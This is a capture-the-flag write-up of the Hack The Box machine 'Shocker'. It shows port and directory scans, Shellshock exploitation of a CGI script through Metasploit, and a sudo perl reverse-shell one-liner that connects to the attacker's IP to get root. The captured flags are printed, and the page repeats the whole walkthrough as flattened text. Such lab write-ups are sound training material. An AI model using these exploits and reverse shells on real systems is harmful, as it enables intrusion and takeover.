Shocker

Nmap Scan

                                                                               
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -p- -Pn shocker.htb -T5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 20:40 IST
Stats: 0:03:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 62.92% done; ETC: 20:45 (0:01:47 remaining)
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap done: 1 IP address (1 host up) scanned in 310.35 seconds
                                                                                
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -sC -sV -p 80,2222 -A shocker.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 20:55 IST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (95%), Linux 3.2 - 4.9 (95%), Linux 4.8 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   160.27 ms 10.10.14.1
2   160.38 ms shocker.htb (10.10.10.56)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.61 seconds

Checking the website with browser reveals nothing , there is just a picture and nothing in view-source .

Let us check the existing directories ( if any ) on the machine.

                                                                                                                                                                                           
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ dirb http://shocker.htb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Jun 25 00:49:37 2023
URL_BASE: http://shocker.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)

gobuster on first scan did not give much apart from directory - /cgi-bin/ cgi-bin directory is normally to handle stuff from WebServer to scripts for certain executions.

Let us further enumerate the directory - /cgi-bin/ , We are changing the below options for results. Since cgi-bin is known to have scripts, we add -x pl,sh Checking cgi-bin in browser gives access denied, so we include 403 in status codes to give back results for.

                                                                                                                                                                                           
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ gobuster dir -u shocker.htb/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt --threads 200 -s 200,204,301,303,307,403 -b "" -x sh,pl
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:            http://shocker.htb/cgi-bin/
[+] Method:         GET
[+] Threads:        200
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
[+] Status codes:   200,204,301,303,307,403
[+] User Agent:     gobuster/3.5
[+] Extensions:     sh,pl
[+] Timeout:        10s
===============================================================
2023/06/25 00:57:18 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 118]

The machine name, script, directory- cgi-bin, on apache2, point to ShellShock vulnerability. Lets check for shellshock exploitation .

Nmap Shellshock Vulnerability Check.

                                                                                            
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=whoami shocker.htb   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-24 14:52 IST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.059s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     Exploit results:
|       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|   <html><head>
|   <title>500 Internal Server Error</title>
|   </head><body>
|   <h1>Internal Server Error</h1>
|   <p>The server encountered an internal error or
|   misconfiguration and was unable to complete
|   your request.</p>
|   <p>Please contact the server administrator at 
|    webmaster@localhost to inform them of the time this error occurred,
|    and the actions you performed just before this error.</p>
|   <p>More information about this error may be available
|   in the server error log.</p>
|   <hr>
|   <address>Apache/2.4.18 (Ubuntu) Server at shocker.htb Port 80</address>
|   </body></html>
|   
|     References:
|       http://seclists.org/oss-sec/2014/q3/685
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_      http://www.openwall.com/lists/oss-security/2014/09/24/10
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds

We have the script from Nmap for explotation but for easy way around I will use metasploit I have selected Shellshock - exploit/multi/http/apache_mod_cgi_bash_env_exec and set a payload.


msf6 > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   1   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   2   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
  .
  .
  <Redacted>


Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec

msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   .<REDACTED>
   8   payload/linux/x86/exec                                             normal  No     Linux Execute Command
   9   payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   10  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   11  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   12  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
.
.<REDACTED>

   33  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   34  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)


msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload 33
payload => linux/x86/shell_reverse_tcp

Now show options, and set RHOST, LHOST, LPORT, TARGETURI , and run or exploit

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                        yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x86/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST  192.168.1.7      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST shocker.htb
RHOST => shocker.htb
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/user.sh
targeturi => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost tun0
lhost => 10.10.116.14
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

[*] Started reverse TCP handler on 10.10.16.4:4444 
[*] Command Stager progress - 100.00% done (817/817 bytes)
[*] Command shell session 1 opened (10.10.116.14:4444 -> 10.10.10.56:51908) at 2023-06-24 15:56:34 +0530

Now we have a shell, lets switch to pty shell with python and check the user directory or flags. With sudo -l we also see we can run perl with sudo without password.

whoami
shelly

python3 -c 'import pty;pty.spawn("/bin/bash")'
shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.116.14";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
<n(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

sudo /usr/bin/perl -e 'use Socket;$i="10.10.116.14";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python3 -c 'import pty;pty.spawn("/bin/bash")'
shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.16.4";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
<n(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'   


Netcat-----------------------

                                                                                           
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ nc -nlvp 7777       
listening on [any] 7777 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.56] 59352
# whoami
root
#

Flags

shelly@Shocker:/usr/lib/cgi-bin$ whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ pwd
pwd
/usr/lib/cgi-bin
shelly@Shocker:/usr/lib/cgi-bin$ cd ~
cd ~
shelly@Shocker:/home/shelly$ pwd
pwd
/home/shelly
shelly@Shocker:/home/shelly$ ls
ls
user.txt
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
20c64e46583e99a6aa565d829bd877a9
shelly@Shocker:/home/shelly$

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ nc -nlvp 7777       
listening on [any] 7777 ...
connect to [10.10.116.14] from (UNKNOWN) [10.10.10.56] 59352
# whoami
root
# #root flag below
# cat /root/root.txt
95cfee3c46c56005159cabca155b33b1
# #user Flag below for Shocker
# #we should ideally be doing from shelly user
# cat /home/shelly/user.txt 
20c64e46583e99a6aa565d829bd877a9

PreviousLame NextTryHackMe

Last updated 1 year ago

Was this helpful?

┌──(abhinav㉿ETHICALHACKX)-[~] └─$ sudo nmap -p- -Pn shocker.htb -T5 Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 20:40 IST Stats: 0:03:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 62.92% done; ETC: 20:45 (0:01:47 remaining) Nmap scan report for shocker.htb (10.10.10.56) Host is up (0.16s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 2222/tcp open EtherNetIP-1 Nmap done: 1 IP address (1 host up) scanned in 310.35 seconds ┌──(abhinav㉿ETHICALHACKX)-[~] └─$ sudo nmap -sC -sV -p 80,2222 -A shocker.htb Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 20:55 IST Nmap scan report for shocker.htb (10.10.10.56) Host is up (0.16s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.18 (Ubuntu) 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4f8ade8f80477decf150d630a187e49 (RSA) | 256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA) |_ 256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.13 (95%), Linux 3.2 - 4.9 (95%), Linux 4.8 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 160.27 ms 10.10.14.1 2 160.38 ms shocker.htb (10.10.10.56) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.61 seconds

┌──(abhinav㉿ETHICALHACKX)-[~] └─$ dirb http://shocker.htb ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Jun 25 00:49:37 2023 URL_BASE: http://shocker.htb/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://shocker.htb/ ---- + http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)

┌──(abhinav㉿ETHICALHACKX)-[~] └─$ gobuster dir -u shocker.htb/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt --threads 200 -s 200,204,301,303,307,403 -b "" -x sh,pl =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://shocker.htb/cgi-bin/ [+] Method: GET [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt [+] Status codes: 200,204,301,303,307,403 [+] User Agent: gobuster/3.5 [+] Extensions: sh,pl [+] Timeout: 10s =============================================================== 2023/06/25 00:57:18 Starting gobuster in directory enumeration mode =============================================================== /user.sh (Status: 200) [Size: 118]

┌──(abhinav㉿ETHICALHACKX)-[~] └─$ nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=whoami shocker.htb Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-24 14:52 IST Nmap scan report for shocker.htb (10.10.10.56) Host is up (0.059s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-shellshock: | VULNERABLE: | HTTP Shellshock vulnerability | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2014-6271 | This web application might be affected by the vulnerability known | as Shellshock. It seems the server is executing commands injected | via malicious HTTP headers. | | Disclosure date: 2014-09-24 | Exploit results: | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | <html><head> | <title>500 Internal Server Error</title> | </head><body> | <h1>Internal Server Error</h1> | <p>The server encountered an internal error or | misconfiguration and was unable to complete | your request.</p> | <p>Please contact the server administrator at | webmaster@localhost to inform them of the time this error occurred, | and the actions you performed just before this error.</p> | <p>More information about this error may be available | in the server error log.</p> | <hr> | <address>Apache/2.4.18 (Ubuntu) Server at shocker.htb Port 80</address> | </body></html> | | References: | http://seclists.org/oss-sec/2014/q3/685 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 |_ http://www.openwall.com/lists/oss-security/2014/09/24/10 |_http-server-header: Apache/2.4.18 (Ubuntu) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds

msf6 > search shellshock Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock) 1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) 2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner . . <Redacted> Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec msf6 > use 1 [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show payloads Compatible Payloads =================== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 payload/generic/custom normal No Custom Payload .<REDACTED> 8 payload/linux/x86/exec normal No Linux Execute Command 9 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86) 10 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86) 11 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager 12 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86) . .<REDACTED> 33 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline 34 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6) msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload 33 payload => linux/x86/shell_reverse_tcp

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD_MAX_LENGTH 2048 yes CMD max line length CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278) HEADER User-Agent yes HTTP header to use METHOD GET yes HTTP method to use Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPATH /bin yes Target PATH for binaries used by the CmdStager RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI yes Path to CGI script TIMEOUT 5 yes HTTP read response timeout (seconds) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. Payload options (linux/x86/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- CMD /bin/sh yes The command string to execute LHOST 192.168.1.7 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Linux x86 View the full module info with the info, or info -d command. msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST shocker.htb RHOST => shocker.htb msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/user.sh targeturi => /cgi-bin/user.sh msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost tun0 lhost => 10.10.116.14 msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run [*] Started reverse TCP handler on 10.10.16.4:4444 [*] Command Stager progress - 100.00% done (817/817 bytes) [*] Command shell session 1 opened (10.10.116.14:4444 -> 10.10.10.56:51908) at 2023-06-24 15:56:34 +0530

whoami shelly python3 -c 'import pty;pty.spawn("/bin/bash")' shelly@Shocker:/usr/lib/cgi-bin$ sudo -l sudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.116.14";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' <n(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

sudo /usr/bin/perl -e 'use Socket;$i="10.10.116.14";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python3 -c 'import pty;pty.spawn("/bin/bash")' shelly@Shocker:/usr/lib/cgi-bin$ sudo -l sudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.16.4";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' <n(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Netcat----------------------- ┌──(abhinav㉿ETHICALHACKX)-[~] └─$ nc -nlvp 7777 listening on [any] 7777 ... connect to [10.10.16.4] from (UNKNOWN) [10.10.10.56] 59352 # whoami root #

shelly@Shocker:/usr/lib/cgi-bin$ whoami shelly shelly@Shocker:/usr/lib/cgi-bin$ pwd pwd /usr/lib/cgi-bin shelly@Shocker:/usr/lib/cgi-bin$ cd ~ cd ~ shelly@Shocker:/home/shelly$ pwd pwd /home/shelly shelly@Shocker:/home/shelly$ ls ls user.txt shelly@Shocker:/home/shelly$ cat user.txt cat user.txt 20c64e46583e99a6aa565d829bd877a9 shelly@Shocker:/home/shelly$

┌──(abhinav㉿ETHICALHACKX)-[~] └─$ nc -nlvp 7777 listening on [any] 7777 ... connect to [10.10.116.14] from (UNKNOWN) [10.10.10.56] 59352 # whoami root # #root flag below # cat /root/root.txt 95cfee3c46c56005159cabca155b33b1 # #user Flag below for Shocker # #we should ideally be doing from shelly user # cat /home/shelly/user.txt 20c64e46583e99a6aa565d829bd877a9